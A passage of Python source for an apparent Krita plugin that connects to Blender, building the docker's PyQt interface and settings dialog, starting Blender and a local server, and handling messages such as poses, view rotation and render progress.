applied to\"))\n\n poseList = QListWidget()\n poseList.setFlow(QListWidget.LeftToRight)\n poseList.setHorizontalScrollMode(QListWidget.ScrollPerPixel)\n poseList.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n poseList.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOn)\n poseList.setMinimumHeight(190)\n poseList.setMaximumHeight(190)\n poseList.setSpacing(0)\n poseList.setSelectionMode(QAbstractItemView.NoSelection)\n poseList.setToolTip(i18n(\"Pose library assets.\\nDouble click to apply\"))\n\n libraryFormLayout.addRow(i18n(\"Add to scene:\"), libraryHBoxLayout)\n #libraryFormLayout.addRow(line4)\n #libraryFormLayout.addRow(poseLabel, poseComboBox)\n libraryVBoxLayout.addLayout(libraryFormLayout)\n libraryVBoxLayout.addWidget(poseList)\n libraryGroupBox.setLayout(libraryVBoxLayout)\n \n vboxlayout = QVBoxLayout()\n vboxlayout.addWidget(connectionGroupBox)\n vboxlayout.addLayout(viewHBoxLayout)\n vboxlayout.addWidget(renderGroupBox)\n vboxlayout.addWidget(viewGroupBox)\n vboxlayout.addLayout(updateHBoxLayout)\n vboxlayout.addWidget(updateGroupBox)\n vboxlayout.addWidget(regionCheck)\n vboxlayout.addWidget(regionGroupBox)\n vboxlayout.addWidget(libraryGroupBox)\n vboxlayout.addStretch(1)\n vboxlayout.addLayout(settingsHBoxLayout)\n scrollContainer.setLayout(vboxlayout)\n self.setWidget(scroll)\n \n self.progress = updateProgress\n self.settingsButton = settingsButton\n self.startstop = startstopButton\n self.startBlenderButton = startBlenderButton\n self.statusBar = statusBar\n self.renderGroup = renderGroupBox\n self.renderOverride = renderOverrideCheck\n self.renderOverridePath = renderPathCheck\n self.renderOverrideRes = renderResCheck\n self.renderTransparency = renderTransparencyCheck\n self.renderTemporary = renderTemporaryCheck\n self.renderButtonLayout = renderHBoxLayout\n self.view = viewComboBox\n self.viewGroup = 
viewGroupBox\n self.currentViewLayout = currentViewVBoxLayout\n self.navigate = navigateWidget\n self.roll = rollSpinBox\n self.lens = lensSpinBox\n self.transparentCheck = transparentCheck\n self.shading = shadingComboBox\n self.cyclesWarning = cyclesWarning\n self.manualWarning = manualWarning\n self.update = updateComboBox\n self.updateLayout = updateHBoxLayout\n self.updateGroup = updateGroupBox\n self.updateRate = updateRateComboBox\n self.updateRateLabel = updateRateLabel\n self.updateRes = updateResComboBox\n self.updateResLabel = updateResLabel\n self.updateForm = updateForm\n self.updateSeperator = line3\n self.updateButtonLayout = updateButtonsHBoxLayout\n self.regionGroup = regionGroupBox\n self.regionX = regionXSpinBox\n self.regionY = regionYSpinBox\n self.regionWidth = regionWidthSpinBox\n self.regionHeight = regionHeightSpinBox\n self.regionViewport = regionViewportCheck\n self.libraryGroup = libraryGroupBox\n self.libraryForm = libraryFormLayout\n self.libraryObject = libraryComboBox\n self.libraryAppend = libraryAppendButton\n self.librarySeperator = line4\n self.poseArmaturesLabel = poseLabel\n self.poseArmatures = poseComboBox\n self.poseList = poseList\n\n settingsButton.clicked.connect(self.showSettings) \n startstopButton.clicked.connect(self.startStopServer) \n startBlenderButton.clicked.connect(self.startBlender)\n assistantsButton.clicked.connect(self.createAssistants)\n regionSelectionButton.clicked.connect(self.regionFromSelection)\n updateButton.clicked.connect(self.updateFrame)\n updateAnimButton.clicked.connect(self.updateAnimation)\n\n renderButton.clicked.connect(self.render)\n renderAnimationButton.clicked.connect(partial(self.updateAnimation, True))\n\n renderOverrideCheck.toggled.connect(partial(self.setLayoutVisible, renderOverrideVBoxLayout))\n renderCurrentViewCheck.toggled.connect(partial(self.setSettingsAndSend, 'renderCurrentView'))\n\n poseList.itemDoubleClicked.connect(self.applyPose)\n poseList.horizontalScrollBar().valueChanged.connect(self.requestPosePreviews)\n libraryAppendButton.clicked.connect(self.appendFromLibrary)\n \n viewComboBox.currentIndexChanged.connect(self.viewModeChanged)\n updateComboBox.currentIndexChanged.connect(self.updateModeChanged)\n regionCheck.toggled.connect(regionGroupBox.setVisible)\n regionCheck.toggled.connect(self.resetRegion)\n\n navigateWidget.rotateSignal.connect(lambda p: self.sendBlockableMessage(('rotate', p.x(), p.y(), float(rollSpinBox.value() / 180 * math.pi))))\n navigateWidget.panSignal.connect(lambda p: self.sendBlockableMessage(('pan', p.x(), p.y())))\n navigateWidget.zoomSignal.connect(lambda f: self.sendBlockableMessage(('zoom', f)))\n navigateWidget.orthoSignal.connect(lambda b: self.sendBlockableMessage(('ortho', b)))\n rollSpinBox.valueChanged.connect(lambda v: self.sendBlockableMessage(('rotate', navigateWidget.rotation.x(), navigateWidget.rotation.y(), float(v / 180 * math.pi))))\n lensSpinBox.valueChanged.connect(lambda v: self.sendBlockableMessage(('lens', v)))\n lensZoomCheck.toggled.connect(partial(self.setSettingsAndSend, 'lensZoom'))\n shadingComboBox.currentIndexChanged.connect(lambda v: self.sendBlockableMessage(('shading', v)))\n shadingComboBox.currentIndexChanged.connect(lambda v: self.updateCyclesWarning(self.settings.engine, v))\n\n transparentCheck.toggled.connect(partial(self.setSettingsAndSend, 'transparency'))\n gizmoCheck.toggled.connect(partial(self.setSettingsAndSend, 'gizmos'))\n\n updateRateComboBox.currentIndexChanged.connect(partial(self.setSettingsAndSend, 
'framerateScale'))\n updateResComboBox.currentIndexChanged.connect(partial(self.setSettingsAndSend, 'scale'))\n\n regionXSpinBox.valueChanged.connect(self.regionChanged)\n regionYSpinBox.valueChanged.connect(self.regionChanged)\n regionWidthSpinBox.valueChanged.connect(self.regionChanged)\n regionHeightSpinBox.valueChanged.connect(self.regionChanged)\n regionViewportCheck.toggled.connect(self.regionChanged)\n\n self.setLayoutEnabled(self.updateButtonLayout, False)\n self.setLayoutEnabled(self.renderButtonLayout, False)\n libraryGroupBox.setEnabled(False)\n viewGroupBox.setEnabled(False)\n self.updatePoseLibrary([], True)\n self.updateLibraryObjects()\n self.updateModeChanged(1)\n self.viewModeChanged(0)\n self.setStatus(i18n(\"Start server to begin\"))\n \n self.uiContainer = scrollContainer \n self.setAcceptDrops(True)\n QApplication.instance().installEventFilter(self)\n\n def createActions(self):\n if not self.createdActions:\n self.createdActions = True\n window = instance.activeWindow()\n window.createAction('blender_layer_blender').triggered.connect(self.startBlender)\n window.createAction('blender_layer_update').triggered.connect(self.updateFrame)\n window.createAction('blender_layer_render').triggered.connect(self.render)\n window.createAction('blender_layer_update_animation').triggered.connect(self.updateAnimation)\n window.createAction('blender_layer_render_animation').triggered.connect(partial(self.updateAnimation, True))\n\n def canvasChanged(self, canvas):\n self.uiContainer.setEnabled(canvas != None and instance.activeDocument() != None and instance.activeDocument().rootNode() != None)\n \n def eventFilter(self, source, event):\n if event.type() == QEvent.MouseButtonPress and event.buttons() == Qt.MidButton and (event.modifiers() & Qt.AltModifier) == Qt.AltModifier and self.settings.navigateAlt and self.navigate and self.navigate.isEnabled() and self.settings.viewMode == 0:\n self.navigate.mousePressEvent(event, True)\n return True\n elif event.type() == QEvent.MouseMove and event.buttons() == Qt.MidButton and (event.modifiers() & Qt.AltModifier) == Qt.AltModifier and self.settings.navigateAlt and self.navigate and self.navigate.isEnabled() and self.settings.viewMode == 0:\n self.navigate.mouseMoveEvent(event)\n return True\n elif event.type() == QEvent.Wheel and (event.modifiers() & Qt.AltModifier) == Qt.AltModifier and self.settings.navigateAlt and self.navigate and self.navigate.isEnabled() and self.settings.viewMode == 0:\n self.navigate.wheelEvent(event)\n return True\n elif event.type() == QEvent.Drop and self.uiContainer.isEnabled() and event.mimeData().hasUrls() and any(u.toLocalFile().endswith('.blend') for u in event.mimeData().urls()):\n self.dropEvent(event)\n self.setVisible(True)\n return True\n elif type(source) == QMainWindow and event.type() == QEvent.WindowActivate and self.settings.updateMode == 1 and self.server and self.server.running:\n self.server.sendMessage(('requestFrame', True))\n elif (event.type() == QEvent.ContextMenu and source is self.poseList):\n menu = QtWidgets.QMenu()\n menu.addAction(i18n(\"Apply Pose\"))\n flipped = menu.addAction(i18n(\"Apply Flipped\"))\n action = menu.exec_(event.globalPos())\n if action:\n item = source.itemAt(event.pos())\n self.applyPose(item, action == flipped)\n return True\n return super().eventFilter(source, event)\n\n def setSettingsAndSend(self, attr, v):\n setattr(self.settings, attr, v)\n if self.server and self.server.running:\n self.server.sendMessage((attr, v))\n\n def sendBlockableMessage(self, msg):\n if 
not self.blockServerSignal and self.server and self.server.running:\n self.server.sendMessage(msg)\n\n def changeSpinBox(self, box, value):\n box.setValue(value / 10.0)\n \n def changeSlider(self, slider, value):\n slider.setValue(int(value * 10.0))\n \n def dragEnterEvent(self, event):\n if self.uiContainer.isEnabled() and event.mimeData().hasUrls() and any(u.toLocalFile().endswith('.blend') for u in event.mimeData().urls()):\n event.accept()\n else:\n event.ignore()\n\n def dropEvent(self, event):\n files = [u.toLocalFile() for u in event.mimeData().urls() if u.toLocalFile().endswith('.blend')]\n self.startBlender(True, files[0])\n\n def showSettings(self):\n self.determineBlenderPath(False)\n self.settingsButton.setEnabled(False)\n\n dialog = QDialog(Application.activeWindow().qwindow())\n dialog.setWindowTitle(i18n(\"Blender Layer Settings\"))\n buttonBox = QDialogButtonBox()\n buttonBox.setOrientation(QtCore.Qt.Horizontal)\n buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n buttonBox.accepted.connect(dialog.accept)\n buttonBox.rejected.connect(dialog.reject)\n \n blenderPathInput = QLineEdit()\n blenderPathInput.setText(self.settings.blenderPath)\n blenderPathInput.textEdited.connect(lambda s: setattr(self.settings, 'blenderPath', s))\n blenderPathInput.setToolTip(i18n(\"Path to the Blender executable\"))\n\n def browseBlenderPath():\n dialog = QFileDialog(self, i18n(\"Open Blender executable\"), self.settings.blenderPath if os.path.isfile(self.settings.blenderPath) else QStandardPaths.writableLocation(QStandardPaths.ApplicationsLocation)) \n if dialog.exec_() == QDialog.Accepted:\n self.settings.blenderPath = dialog.selectedUrls()[0].toLocalFile() \n blenderPathInput.setText(self.settings.blenderPath)\n \n blenderPathBrowse = QPushButton()\n blenderPathBrowse.setIcon(instance.icon('folder'))\n blenderPathBrowse.clicked.connect(browseBlenderPath)\n blenderPathBrowse.setToolTip(i18n(\"Browse\"))\n\n blenderPathHBoxLayout = QHBoxLayout()\n blenderPathHBoxLayout.addWidget(blenderPathInput)\n blenderPathHBoxLayout.addWidget(blenderPathBrowse)\n\n renderPathInput = QLineEdit()\n renderPathInput.setText(self.settings.renderPath)\n renderPathInput.textEdited.connect(lambda s: setattr(self.settings, 'renderPath', s))\n renderPathInput.setToolTip(i18n(\"Path where rendered frames will be saved\"))\n\n def browseRenderPath():\n (fileName, mime) = QFileDialog.getSaveFileName(self, i18n(\"Select render output path\"), self.settings.renderPath if os.path.isdir(os.path.dirname(self.settings.renderPath)) else '/tmp')\n if fileName:\n self.settings.renderPath = fileName\n renderPathInput.setText(self.settings.renderPath)\n \n renderPathBrowse = QPushButton()\n renderPathBrowse.setIcon(instance.icon('folder'))\n renderPathBrowse.clicked.connect(browseRenderPath)\n renderPathBrowse.setToolTip(i18n(\"Browse\"))\n\n renderPathHBoxLayout = QHBoxLayout()\n renderPathHBoxLayout.addWidget(renderPathInput)\n renderPathHBoxLayout.addWidget(renderPathBrowse)\n \n layerNameInput = QLineEdit()\n layerNameInput.setText(self.settings.layerName)\n layerNameInput.textEdited.connect(lambda s: setattr(self.settings, 'layerName', s))\n layerNameInput.setToolTip(i18n(\"Name of the layer which shows the view from Blender\"))\n\n relPathCheckBox = QCheckBox(i18n(\"Use relative paths for .blend files\"))\n relPathCheckBox.setChecked(self.settings.relPath)\n relPathCheckBox.toggled.connect(lambda v: setattr(self.settings, 'relPath', v))\n relPathCheckBox.setToolTip(i18n(\"Use a path relative to 
the current document\\nwhen saving the name of the last open .blend file\"))\n\n navigateAltCheckBox = QCheckBox(i18n(\"Enable navigation with Alt + Middle Button\"))\n navigateAltCheckBox.setChecked(self.settings.navigateAlt)\n navigateAltCheckBox.toggled.connect(lambda v: setattr(self.settings, 'navigateAlt', v))\n navigateAltCheckBox.setToolTip(i18n(\"Enables rotating the view by holding Alt and pressing the Middle Mouse Button,\\nYou can also pan by additionaly holding Ctrl\\nand zoom by holding Shift or using the mouse wheel\"))\n \n form = QFormLayout()\n form.addRow(i18n(\"Blender location:\"), blenderPathHBoxLayout)\n form.addRow(i18n(\"Render location:\"), renderPathHBoxLayout)\n form.addRow(i18n(\"Layer name\"), layerNameInput)\n form.addRow(relPathCheckBox)\n form.addRow(navigateAltCheckBox)\n\n line = QFrame()\n line.setFrameShape(QFrame.HLine)\n line.setFrameShadow(QFrame.Sunken)\n \n libraryGroupBox = QGroupBox(i18n(\"Library\"))\n \n libraryTable = QTableWidget(len(self.settings.library), 3)\n libraryTable.setHorizontalHeaderLabels([i18n(\"Name\"), i18n(\"Path to .blend File\"), i18n(\"Objects to append\")])\n libraryTable.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n libraryTable.verticalHeader().setVisible(False)\n libraryTable.setSelectionMode(QAbstractItemView.NoSelection)\n libraryTable.setMinimumHeight(190)\n \n row = 0\n for (name, file, innerpath) in self.settings.library:\n libraryTable.setItem(row, 0, QTableWidgetItem(name))\n libraryTable.setItem(row, 1, QTableWidgetItem(file))\n libraryTable.setItem(row, 2, QTableWidgetItem(innerpath))\n row = row + 1\n\n def browseBlendFile():\n row = libraryTable.rowCount() if libraryTable.currentRow() < 0 else libraryTable.currentRow()\n lastItem = libraryTable.item(row, 0)\n lastPath = lastItem.text() if lastItem else ''\n dialog = QFileDialog(self, i18n(\"Open .blend file\"), lastPath if os.path.isfile(lastPath) else QStandardPaths.writableLocation(QStandardPaths.PicturesLocation)) \n if dialog.exec_() == QDialog.Accepted:\n row = libraryTable.rowCount() if libraryTable.currentRow() < 0 else libraryTable.currentRow() + 1\n for file in dialog.selectedUrls():\n file = file.toLocalFile() \n libraryTable.insertRow(row)\n libraryTable.setItem(row, 0, QTableWidgetItem(os.path.basename(file)))\n libraryTable.setItem(row, 1, QTableWidgetItem(file))\n libraryTable.setItem(row, 2, QTableWidgetItem(''))\n row = row + 1\n\n creditLabel = QLabel(\"Body-chan models CC-0 by \" + 'vinchau')\n creditLabel.setTextInteractionFlags(Qt.TextBrowserInteraction);\n creditLabel.setOpenExternalLinks(True);\n addButton = QToolButton()\n addButton.setIcon(instance.icon('addlayer'))\n addButton.setToolTip(i18n(\"Add\"))\n addButton.clicked.connect(browseBlendFile)\n removeButton = QToolButton()\n removeButton.setIcon(instance.icon('deletelayer'))\n removeButton.setToolTip(i18n(\"Remove\"))\n removeButton.clicked.connect(lambda: libraryTable.removeRow(libraryTable.currentRow()))\n \n librarHBox = QHBoxLayout()\n librarHBox.setContentsMargins(11, 0, 11, 11)\n librarHBox.addWidget(creditLabel)\n librarHBox.addStretch()\n librarHBox.addWidget(addButton)\n librarHBox.addWidget(removeButton)\n \n libraryVBox = QVBoxLayout()\n libraryVBox.setContentsMargins(0, 0, 0, 0)\n libraryVBox.addWidget(libraryTable)\n libraryVBox.addLayout(librarHBox)\n libraryGroupBox.setLayout(libraryVBox)\n\n connectionGroupBox = QGroupBox(i18n(\"Connection\"))\n \n portSpinBox = QSpinBox()\n portSpinBox.setRange(0, 65535)\n portSpinBox.setValue(self.settings.port)\n 
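# The dialog binds widgets directly onto self.settings with setattr lambdas, as below.\n        # A small helper (purely illustrative, not part of the original) would express the\n        # same binding pattern once:\n        #   def bind(signal, attr):\n        #       signal.connect(lambda v, a=attr: setattr(self.settings, a, v))\n        #   bind(portSpinBox.valueChanged, 'port')\n        #   bind(hostInput.textEdited, 'host')\n        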
portSpinBox.valueChanged.connect(lambda v: setattr(self.settings, 'port', v))\n \n hostInput = QLineEdit()\n hostInput.setText(self.settings.host)\n hostInput.textEdited.connect(lambda s: setattr(self.settings, 'host', s))\n \n sharedMemCheckBox = QCheckBox(i18n(\"Use shared memory buffer\"))\n sharedMemCheckBox.setChecked(self.settings.sharedMem)\n sharedMemCheckBox.setToolTip(i18n(\"Use shared memory to transfer the pixels from Blender.\\nShould have better performance than sending them via the socket\"))\n sharedMemCheckBox.toggled.connect(lambda v: setattr(self.settings, 'sharedMem', v))\n\n connectionForm = QFormLayout()\n connectionForm.addRow(i18n(\"Host:\"), hostInput)\n connectionForm.addRow(i18n(\"Port:\"), portSpinBox)\n connectionForm.addRow(sharedMemCheckBox)\n connectionGroupBox.setLayout(connectionForm)\n \n assistantsGroupBox = QGroupBox(i18n(\"Assistants\"))\n\n threePointCheckBox = QCheckBox(i18n(\"3 Point Perspective\"))\n threePointCheckBox.setChecked(self.settings.assistantsThreePoint)\n threePointCheckBox.setToolTip(i18n(\"Include a third vanishing point in the assistant set\"))\n threePointCheckBox.toggled.connect(lambda v: setattr(self.settings, 'assistantsThreePoint', v))\n\n axisCheckBox = QCheckBox(i18n(\"Colored Axis\"))\n axisCheckBox.setChecked(self.settings.assistantsAxis)\n axisCheckBox.setToolTip(i18n(\"Include colored lines representing the axis in the assistant set\"))\n axisCheckBox.toggled.connect(lambda v: setattr(self.settings, 'assistantsAxis', v))\n\n assistantsVBox = QVBoxLayout()\n assistantsVBox.addWidget(threePointCheckBox)\n assistantsVBox.addWidget(axisCheckBox)\n assistantsGroupBox.setLayout(assistantsVBox)\n \n colorManagementGroupBox = QGroupBox(i18n(\"Color Management\"))\n\n overrideSRGBCheckBox = QCheckBox(i18n(\"Override layer color profile with 'sRGB-elle-V2-srgbtrc.icc'\"))\n overrideSRGBCheckBox.setChecked(self.settings.overrideSRGB)\n overrideSRGBCheckBox.setToolTip(i18n(\"When disabled the document's default color space will be used.\\nOnly disable if you know what you're doing.\\nSupport for different color depths is limited\"))\n overrideSRGBCheckBox.toggled.connect(lambda v: setattr(self.settings, 'overrideSRGB', v))\n\n colorMangeBlenderCheckBox = QCheckBox(i18n(\"Perform Blender's color management\"))\n colorMangeBlenderCheckBox.setChecked(self.settings.colorManageBlender)\n colorMangeBlenderCheckBox.setToolTip(i18n(\"Disable if you're using a linear gamma color space\"))\n colorMangeBlenderCheckBox.toggled.connect(lambda v: setattr(self.settings, 'colorManageBlender', v))\n\n convertBGRCheckBox = QCheckBox(i18n(\"Perform BGR to RGB conversion\"))\n convertBGRCheckBox.setChecked(self.settings.convertBGR)\n convertBGRCheckBox.setToolTip(i18n(\"Disable if R and B channels appear to be switched\"))\n convertBGRCheckBox.toggled.connect(lambda v: setattr(self.settings, 'convertBGR', v))\n\n colorManagementVBox = QVBoxLayout()\n colorManagementVBox.addWidget(overrideSRGBCheckBox)\n colorManagementVBox.addWidget(colorMangeBlenderCheckBox)\n colorManagementVBox.addWidget(convertBGRCheckBox)\n colorManagementGroupBox.setLayout(colorManagementVBox)\n \n dangerGroupBox = QGroupBox(i18n(\"Danger Zone (Use at your own risk)\"))\n\n backgroundDrawCheckBox = QCheckBox(i18n(\"Allow drawing while minimized\"))\n backgroundDrawCheckBox.setChecked(self.settings.backgroundDraw)\n backgroundDrawCheckBox.setToolTip(i18n(\"Will crash once in a while\"))\n backgroundDrawCheckBox.toggled.connect(lambda v: setattr(self.settings, 'backgroundDraw', v))\n 
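# Hedged sketch of the shared-memory transfer toggled above (the real implementation\n        # lives in blenderLayerServer.py; the buffer name and size here are hypothetical):\n        #   from multiprocessing import shared_memory\n        #   shm = shared_memory.SharedMemory(name='kritaBlenderFrame', create=True, size=width * height * 4)\n        #   shm.buf[:n] = pixel_bytes       # producer side writes RGBA pixels\n        #   frame = bytes(shm.buf[:n])      # consumer side attaches with create=False and reads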
\n        lockFramesSpinBox = QSpinBox()\n        lockFramesSpinBox.setRange(0, 120)\n        lockFramesSpinBox.setSuffix(i18n(\" frames\"))\n        lockFramesSpinBox.setValue(self.settings.lockFrames)\n        lockFramesSpinBox.setToolTip(i18n(\"Hold krita's image lock for the specified number of frames\\nSetting this to 0 will disable locking resulting in crashes if the image is edited at the same time the frame is updated\"))\n        lockFramesSpinBox.valueChanged.connect(lambda v: setattr(self.settings, 'lockFrames', v))\n\n        dangerForm = QFormLayout()\n        dangerForm.addRow(backgroundDrawCheckBox)\n        dangerForm.addRow(i18n(\"Hold lock for: \"), lockFramesSpinBox)\n        dangerGroupBox.setLayout(dangerForm)\n        \n        scrollContainer = QWidget()\n        vbox = QVBoxLayout(scrollContainer)\n        vbox.addLayout(form)\n        vbox.addWidget(line)\n        vbox.addWidget(libraryGroupBox)\n        vbox.addWidget(connectionGroupBox)\n        vbox.addWidget(assistantsGroupBox)\n        vbox.addWidget(colorManagementGroupBox)\n        vbox.addWidget(dangerGroupBox)\n        vbox.addStretch(1)\n        \n        scroll = QScrollArea()\n        scroll.setWidget(scrollContainer)\n        scroll.setWidgetResizable(True)\n        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n        scroll.setFrameShape(QFrame.NoFrame)\n        scroll.setFrameShadow(QFrame.Plain)\n        scroll.setMinimumWidth(scrollContainer.minimumSizeHint().width() + scroll.verticalScrollBar().minimumSizeHint().width() + 22)\n\n        dialogVbox = QVBoxLayout(dialog)\n        dialogVbox.addWidget(scroll)\n        dialogVbox.addWidget(buttonBox)\n        dialog.show()\n        dialog.activateWindow()\n        if dialog.exec_() == QDialog.Accepted:\n            lib = []\n            for row in range(0, libraryTable.rowCount()):\n                name = libraryTable.item(row, 0).text()\n                file = libraryTable.item(row, 1).text()\n                innerpath = libraryTable.item(row, 2).text()\n                lib.append((name, file, innerpath))\n            self.settings.library = lib\n            self.writeSettings()\n        else:\n            self.readSettings()\n        \n        self.updateLibraryObjects()\n        self.settingsButton.setEnabled(True)\n\n    def setStatus(self, message):\n        if message == self.lastStatus:\n            self.statusRepeated = self.statusRepeated + 1\n            message = f'{message} ({self.statusRepeated})'\n        else:\n            self.statusRepeated = 1\n            self.lastStatus = message\n        if self.server and self.server.running:\n            self.statusBar.setText(\" \" + str(message))\n        else:\n            self.statusBar.setText(message) \n    \n    def determineBlenderPath(self, dialog = True):\n        if not self.settings.blenderPath:\n            try:\n                import shutil\n                p = shutil.which('blender')\n                if p and os.path.isfile(p):\n                    self.settings.blenderPath = p\n                \n                elif os.path.isdir(r'C:\Program Files\Blender Foundation'):\n                    versions = sorted(os.listdir(r'C:\Program Files\Blender Foundation'), reverse=True)\n                    for ver in versions:\n                        p = os.path.join(r'C:\Program Files\Blender Foundation', ver, 'blender.exe')\n                        if os.path.isfile(p):\n                            self.settings.blenderPath = p\n                            break\n            except Exception as e:\n                print(e)\n        \n        if not self.settings.blenderPath:\n            if dialog:\n                dialog = QFileDialog(self, i18n(\"Open Blender executable\"), QStandardPaths.writableLocation(QStandardPaths.ApplicationsLocation))\n                if dialog.exec_() == QDialog.Accepted:\n                    self.settings.blenderPath = dialog.selectedUrls()[0].toLocalFile() \n                    self.writeSettings()\n            else:\n                self.writeSettings()\n        \n    \n    def startBlender(self, ignored = False, file = ''): \n        if not instance.activeDocument():\n            return\n        if self.blenderRunning:\n            if file and self.server and self.server.running:\n                self.server.sendMessage(('file', file))\n            return\n        \n        self.determineBlenderPath() \n        if self.settings.blenderPath:\n            args = [self.settings.blenderPath, '--python', 
str(path.abspath(os.path.join(os.path.dirname(__file__), 'blenderLayerClient.py'))), '--', '--connect-to-krita', str(self.settings.host), str(self.settings.port)]\n \n if self.activeInFile == None:\n self.activeInFile = instance.activeDocument().fileName()\n \n if not file:\n file = self.getFilenameFromLayer() \n if file and os.path.isfile(file):\n args.insert(1, file)\n runnable = BlenderRunnable(args)\n runnable.signals.finished.connect(self.onBlenderStopped)\n \n self.blenderRunning = True\n self.startBlenderButton.setEnabled(False)\n self.startBlenderButton.setText(i18n(\"Blender running...\")) \n\n if (not self.server) or (not self.server.running):\n self.startStopServer()\n \n QThreadPool.globalInstance().start(runnable)\n \n def onBlenderStopped(self, result):\n if result:\n self.setStatus(result)\n self.blenderRunning = False\n self.startBlenderButton.setEnabled(True)\n self.startBlenderButton.setText(i18n(\"Start Blender\"))\n \n def startStopServer(self):\n if self.server and self.server.running:\n self.server.running = False\n self.startstop.setEnabled(False)\n self.startstop.setText(i18n(\"Stopping...\"))\n self.activeInFile = None\n self.activeDocument = None\n elif instance.activeDocument():\n self.server = BlenderLayerServer(self.settings)\n self.server.signals.finished.connect(self.onServerStopped)\n self.server.signals.connected.connect(self.onServerConnected)\n self.server.signals.error.connect(self.setStatus)\n self.server.signals.msgReceived.connect(self.handleMessage)\n self.activeDocument = instance.activeDocument()\n self.activeInFile = self.activeDocument.fileName()\n\n QThreadPool.globalInstance().start(self.server)\n self.startstop.setText(i18n(\"Stop Server\"))\n self.setStatus(i18n(\"Waiting for Blender...\"))\n\n def onServerStopped(self, result):\n self.onServerConnected(False, None)\n self.startstop.setEnabled(True)\n self.startstop.setText(i18n(\"Start Server\"))\n if result:\n self.setStatus(result)\n else:\n self.setStatus(i18n(\"Server stopped\"))\n if self.settings.region:\n self.saveRegionToLayer()\n \n def onServerConnected(self, connected, info):\n self.viewGroup.setEnabled(connected)\n self.libraryGroup.setEnabled(connected)\n self.setLayoutEnabled(self.updateButtonLayout, connected)\n self.setLayoutEnabled(self.renderButtonLayout, connected)\n if connected:\n self.startBlenderButton.setEnabled(False)\n self.startBlenderButton.setText(i18n(\"Connected\")) \n file = ''\n if info:\n transparancySupported = info[1]\n file = info[2]\n \n self.transparentCheck.setEnabled(transparancySupported)\n if not transparancySupported:\n self.transparentCheck.setChecked(False)\n if file:\n self.setStatus(i18n(\"Successfully connected\")+'
\\n '+os.path.basename(file))\n                self.saveFilenameToLayer(file)\n            else:\n                self.setStatus(i18n(\"Successfully connected\"))\n        else:\n            self.progress.hide()\n            self.updatePoseLibrary([], True)\n            self.startBlenderButton.setEnabled(not self.blenderRunning)\n            self.startBlenderButton.setText(i18n(\"Blender running...\") if self.blenderRunning else i18n(\"Start Blender\"))\n            self.setStatus(i18n(\"Waiting for Blender...\"))\n    \n    def handleMessage(self, msg):\n        type = msg[0]\n        if type == 'poselib':\n            self.updatePoseLibrary(msg[1], msg[2])\n        elif type == 'armatures':\n            self.poseArmatures.clear()\n            if len(msg[1]) == 0:\n                self.poseArmatures.addItems([i18n(\"\")])\n            else:\n                self.poseArmatures.addItems(msg[1])\n        elif type == 'posePreviews':\n            for (name, pixels) in msg[1]:\n                self.loadPosePreview(name, pixels)\n        elif type == 'rotate':\n            self.blockServerSignal = True\n            self.navigate.setRotation(msg[1], msg[2])\n            self.roll.setValue(msg[3] / math.pi * 180)\n            self.blockServerSignal = False\n        elif type == 'lens':\n            self.blockServerSignal = True\n            self.lens.setValue(msg[1])\n            self.blockServerSignal = False\n        elif type == 'ortho': \n            self.blockServerSignal = True \n            self.navigate.setOrtho(msg[1])\n            self.blockServerSignal = False\n        elif type == 'shading':\n            self.blockServerSignal = True\n            self.shading.setCurrentIndex(msg[1])\n            self.blockServerSignal = False\n        elif type == 'assistants': \n            self.writeAssistants(msg)\n        elif type == 'file':\n            file = msg[1]\n            self.setStatus(i18n(\"Successfully connected\")+ '
'+os.path.basename(file))\n self.saveFilenameToLayer(file)\n elif type == 'engine':\n self.updateCyclesWarning(msg[1], self.settings.shading)\n elif type == 'updateProgress':\n self.update.setCurrentIndex(2)\n self.setStatus(i18n(\"Updated animation frame\"))\n inProgress = msg[1] < msg[3]\n self.progress.setVisible(inProgress)\n self.setLayoutEnabled(self.renderButtonLayout, not inProgress)\n self.setLayoutEnabled(self.updateButtonLayout, not inProgress)\n self.progress.setRange(msg[2], msg[3])\n self.progress.setValue(msg[1])\n elif type == 'renderProgress':\n self.view.setCurrentIndex(2)\n self.update.setCurrentIndex(2)\n self.setStatus(i18n(\"Updated from render result\"))\n inProgress = msg[1] < msg[3]\n self.progress.setVisible(inProgress)\n self.setLayoutEnabled(self.renderButtonLayout, not inProgress)\n self.setLayoutEnabled(self.updateButtonLayout, not inProgress)\n self.progress.setRange(msg[2], msg[3])\n self.progress.setValue(msg[1])\n elif type == 'renderCancelled':\n self.setStatus(i18n(\"Rendering was cancelled\"))\n self.setLayoutEnabled(self.renderButtonLayout, True)\n self.setLayoutEnabled(self.updateButtonLayout, True)\n self.progress.hide()\n elif type == 'status':\n self.setStatus('[Blender] ' + i18n(msg[1]))\n else:\n print(\"Received unrecognized message type from Blender: \", type) \n \n def createAssistants(self):\n (fileName, mime) = QFileDialog.getSaveFileName(self, i18n(\"Save File\"), os.path.join(QStandardPaths.writableLocation(QStandardPaths.PicturesLocation), 'blenderlayer.paintingassistant'), i18n(\"Krita Assistant (*.paintingassistant)\"))\n if fileName:\n instance.action('KisAssistantTool').trigger()\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n self.server.sendMessage(('assistants', fileName, d.width() / d.xRes() * 72.0, d.height() / d.yRes() * 72.0))\n\n def writeAssistants(self, msg):\n fileName = msg[1]\n third = self.settings.assistantsThreePoint\n axis = self.settings.assistantsAxis\n\n handleLength = 5\n #vanishing points\n vxx = msg[2]\n vxy = msg[3]\n vxOrtho = msg[4]\n vyx = msg[5]\n vyy = msg[6]\n vyOrtho = msg[7]\n vzx = msg[8]\n vzy = msg[9] \n vzOrtho = msg[10]\n\n #center\n cx = msg[11]\n cy = msg[12] \n \n if vxOrtho:\n v2xx = cx - vxx * 100\n v2xy = cy - vxy * 100\n vxx = cx + vxx * 100\n vxy = cy + vxy * 100\n else:\n v2xx = cx + (cx - vxx) * 100\n v2xy = cy + (cy - vxy) * 100\n \n if vyOrtho:\n v2yx = cx - vyx * 100\n v2yy = cy - vyy * 100\n vyx = cx + vyx * 100\n vyy = cy + vyy * 100\n else:\n v2yx = cx + (cx - vyx) * 100\n v2yy = cy + (cy - vyy) * 100\n \n if vzOrtho:\n v2zx = cx - vzx * 100\n v2zy = cy - vzy * 100\n vzx = cx + vzx * 100\n vzy = cy + vzy * 